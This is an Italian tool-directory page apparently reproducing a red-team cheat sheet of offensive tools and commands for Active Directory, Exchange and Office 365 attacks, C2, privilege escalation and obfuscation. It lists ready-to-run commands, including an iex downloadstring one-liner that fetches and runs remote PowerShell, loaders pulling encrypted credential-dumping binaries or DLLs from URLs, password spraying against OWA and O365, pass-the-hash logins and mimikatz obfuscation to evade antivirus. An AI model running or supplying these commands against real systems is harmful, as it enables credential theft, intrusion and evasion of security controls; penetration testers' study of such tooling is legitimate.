Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
Pentest-Tools-Collection — Raccolta curata di strumenti e comandi di sicurezza offensiva per attacchi ad Active Directory, C2, escalation dei privilegi, offuscamento e penetration testing web. | Kitploit
Strumenti/GitHubGitHub/luemmelsec/pentest-tools-collection
Escalation di PrivilegiExploitEvasione IDS/IPSRaccolta InformazioniPost-ExploitPenetration TestingCommand and ControlRed TeamingRisorse Curate

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
Sviluppo Payload
GitHubluemmelsec/pentest-tools-collection

Pentest-Tools-Collection

Raccolta curata di strumenti e comandi di sicurezza offensiva per attacchi ad Active Directory, C2, escalation dei privilegi, offuscamento e penetration testing web.

Vedi Repository
90614621 mese faRevisionato da Kitploit

Pentest-Tools-Collection

Active Directory

AMSI

https://amsi.fail/

Raccolte di Strumenti

WinPwn

https://github.com/S3cur3Th1sSh1t/WinPwn

Import-Module .\WinPwn.ps1

iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/master/WinPwn.ps1')

Ghostpack

https://github.com/GhostPack

Seatbelt, KeeThief, Rubeus, SharpUp ...

Powersploit

https://github.com/PowerShellMafia/PowerSploit

PowerView, PowerUp, Get-GPPPassword ...

Enumerazione

Bloodhound

https://github.com/BloodHoundAD/BloodHound

SharpHound.exe -d testdomain.com -c all,gpolocalgroup

Sharphound.ps1 -d testdomain.com -c all,gpolocalgroup

https://github.com/fox-it/BloodHound.py

bloodhound.py -c all

ADRecon

https://github.com/adrecon/ADRecon

Per eseguire ADRecon su un host membro del dominio.
PS C:\> .\ADRecon.ps1

Per eseguire ADRecon su un host membro del dominio come utente diverso.
PS C:\>.\ADRecon.ps1 -DomainController <IP or FQDN> -Credential <domain\username>

Per eseguire ADRecon su un host non membro utilizzando LDAP.
PS C:\>.\ADRecon.ps1 -Method LDAP -DomainController <IP or FQDN> -Credential <domain\username>

Spraying-Toolkit

https://github.com/byt3bl33d3r/SprayingToolkit

Sprayer per Lync/Skype e OWA, generatore di wordlist, convertitore di schemi di denominazione, ecc.

Spraying su OWA
./atomizer.py owa contoso.com 'Fall2018' emails.txt

Spraying su Lync
./atomizer lync contoso.com --user-as-pass usernames.txt

Modalità recon
./atomizer owa 'https://owa.contoso.com/autodiscover/autodiscover.xml' --recon

MailSniper

https://github.com/dafthack/MailSniper

Attacca OWA ed EWS
Lo schema di denominazione dovrebbe essere del tipo testdomain.com\schmidta o aschmidt -> verifica lo schema con il modulo msf

Invoke-PasswordSprayOWA -ExchHostname mail.domain.com -UserList .\userlist.txt -Password Fall2016 -Threads 15 -OutFile owa-sprayed-creds.txt

Get-ADUsernameFromEWS -EmailList email-list.txt

Get-GlobalAddressList -ExchHostname mail.domain.com -UserName domain\username -Password Fall2016 -OutFile global-address-list.txt

msspray

https://github.com/0xZDH/msspray

Strumento di enumerazione e spray per O365

Enumera solo gli utenti senza spray. Richiede un file di testo con indirizzi email completi [email protected]
python3 msspray.py -e -u textfile.txt --wait 10 --verbose

MSOLSpray

https://github.com/dafthack/MSOLSpray

Sprayer per O365

Import-Module MSOLSpray.ps1
Invoke-MSOLSpray -UserList .\userlist.txt -Password Winter2020

ExchangeRelayX

https://github.com/quickbreach/ExchangeRelayX

Attacca EWS tramite autenticazione NTLM su HTTP.

./exchangeRelayx.py -t https://mail.quickbreach.com

SharpView

https://github.com/tevora-threat/SharpView

Porting di PowerView in .NET

SharpView.exe Get-DomainController -Domain test.local -Server dc.test.local -Credential [email protected]/password

CrossLinked

https://github.com/m8r0wn/CrossLinked

Raccogli indirizzi email / utenti

python3 crosslinked.py -f '{first}.{last}@domain.com' company_name

Post Exploitation

impacket

https://github.com/SecureAuthCorp/impacket

Crackmapexec

https://github.com/byt3bl33d3r/CrackMapExec

Documentazione ufficiale: https://mpgn.gitbook.io/crackmapexec/

SharpGPOAbuse

https://github.com/FSecureLABS/SharpGPOAbuse

EvilWinRM

https://github.com/mrnamp/EvilWinRM

Uno strumento per interagire con l'implementazione WS-Management di Microsoft, nota anche come Powershell-Remoting, da una macchina Linux.
Può essere usato anche per connettersi con un hash al posto della password.

ruby evil-winrm.rb -i 192.168.1.100 -u Administrator -p 'MySuperSecr3tPass123!'

ruby evil-winrm.rb -i 192.168.1.100 -u Administrator -H B3D7E7E1516FFBFCB1C54A4C349BC099

È anche in grado di eseguire C#, DLL o shellcode donut direttamente in memoria. Gli eseguibili devono trovarsi nel percorso impostato con l'argomento -e.

Invoke-Binary /opt/csharp/Binary.exe 'param1, param2, param3'

Dll-loader -http -path http://10.11.12.13/evil.dll

Donut-Loader -process_id 1234 -donutfile /use/share/payload.bin

Può anche bypassare AMSI, recuperare ticket Kerberos e così via ...

SharpRDP

https://github.com/rasta-mouse/SharpRDP

Esegui cose tramite RDP. L'utente riceverà una notifica se multi-RDP non è abilitato!

SharpRDP.exe computername=target.domain command="C:\Temp\file.exe" username=domain\user password=password

Inveigh

https://github.com/Kevin-Robertson/Inveigh

Strumento PowerShell per lo spoofing di ADIDNS/LLMNR/mDNS/NBNS/DNS e man-in-the-middle

Import-Module Inveigh.psm1

Invoke-Inveigh -Consoleoutput Y

Responder

https://github.com/lgandx/Responder

Poisoner LLMNR/NBT-NS/mDNS

./Responder.py -I eth0

C2

Covenant

https://github.com/cobbr/Covenant

PS-Empire

https://github.com/BC-SECURITY/Empire

PrivEsc

WinPEAS / LinPEAS

https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite

SecWiki

https://github.com/SecWiki

Exploit per Linux e Windows

PowerShDll

https://github.com/p3nt4/PowerShdll

Powershell senza Powershell

rundll32 PowerShdll,main -w

PowerUpSQL

https://github.com/NetSPI/PowerUpSQL

UACME

https://github.com/hfiref0x/UACME

Watson

https://github.com/rasta-mouse/Watson

PrivescCheck

https://github.com/itm4n/PrivescCheck

Offuscamento

PEzor

https://github.com/phra/PEzor

Offusca binari C / C++

Nuovo modulo -> Fluttuazione dello ShellCode:

PEzor -fluctuate=RW -debug mimikatz.exe -p '"coffee" "sleep 5000" "coffee" "exit"'

Vedi https://twitter.com/phraaaaaaa/status/1453389564383404032?t=wcB-3NlNh9725L9_zRjdHg

Donut Syscall fork

https://github.com/S4ntiagoP/donut/tree/syscalls

Fork del generatore di shellcode / PE di Donut con syscall

amber

https://github.com/EgeBalci/amber

Offusca binari C / C++

Invoke-Obfuscation

https://github.com/danielbohannon/Invoke-Obfuscation

Offuscatore per script PowerShell.

xencrypt / BetterXencrypt

https://github.com/the-xentropy/xencrypt / https://github.com/GetRektBoy724/BetterXencrypt

AQUARMOURY (in special wraith)

https://github.com/slaeryan/AQUARMOURY

Raccolta di strumenti per bypassare AV/EDR e simili

root@kitploit:~
Import-Module ./xencrypt.ps1
Invoke-Xencrypt -InFile invoke-mimikatz.ps1 -OutFile xenmimi.ps1
Invoke-Xencrypt -InFile invoke-mimikatz.ps1 -OutFile xenmimi.ps1 -Iterations 100

Offuscatore e cifratore per script PowerShell.

ISESteroids

https://www.powershellgallery.com/packages/ISESteroids/2.7.1.7

Raccolta di strumenti per PowerShell ISE. Possibilità di offuscamento.

PS2EXE

https://gallery.technet.microsoft.com/scriptcenter/PS2EXE-GUI-Convert-e7cb69d5

Converti file PS1 in EXE.

Invoke-Sharploader

https://github.com/S3cur3Th1sSh1t/Invoke-SharpLoader

Un wrapper per binari C# che cifra il payload e lo decifra in memoria.

Cifra il binario:

Invoke-SharpEncrypt -file C:\CSharpFiles\SafetyKatz.exe -password S3cur3Th1sSh1t -outfile C:\CSharpEncrypted\SafetyKatz.enc

Carica il binario cifrato da URL:

Invoke-SharpLoader -location https://raw.githubusercontent.com/S3cur3Th1sSh1t/Invoke-SharpLoader/master/EncryptedCSharp/SafetyKatz.enc -password S3cur3Th1sSh1t -noArgs

Carica il binario cifrato dal disco con argomenti da riga di comando:

Invoke-SharpLoader -location C:\EncryptedCSharp\Rubeus.enc -password S3cur3Th1sSh1t -argument kerberoast -argument2 "/format:hashcat"

inceptor

https://github.com/klezVirus/inceptor

Offuscatore per C# e Powershell

Chimera

https://github.com/tokyoneon/Chimera

Offuscatore di script PowerShell

InvisibilityCloak

https://github.com/xforcered/InvisibilityCloak

Offuscatore di assembly C#

ConfuserEx

https://github.com/yck1509/ConfuserEx

Offuscatore di assembly C#

Charlotte

https://github.com/9emin1/charlotte

Loader di shellcode tramite D-Invoke

AVCleaner

https://github.com/lleon1435/avcleaner

Offuscatore di sorgenti C/C++

Varie

SharpSploit: https://github.com/cobbr/SharpSploit
ZeroLogon-Tester: https://github.com/BC-SECURITY/Invoke-ZeroLogon / https://github.com/SecuraBV/CVE-2020-1472
Ligolo: https://github.com/sysdream/ligolo
Metasploit: https://github.com/rapid7/metasploit-framework
Socat: https://github.com/craSH/socat
ThreatCheck: https://github.com/rasta-mouse/ThreatCheck
evilginx2: https://github.com/kgretzky/evilginx2
O365 Enum: https://github.com/gremwell/o365enum
O365 spray: https://github.com/0xZDH/o365spray

Web

JSFScan: https://github.com/KathanP19/JSFScan.sh

Scarica lo strumento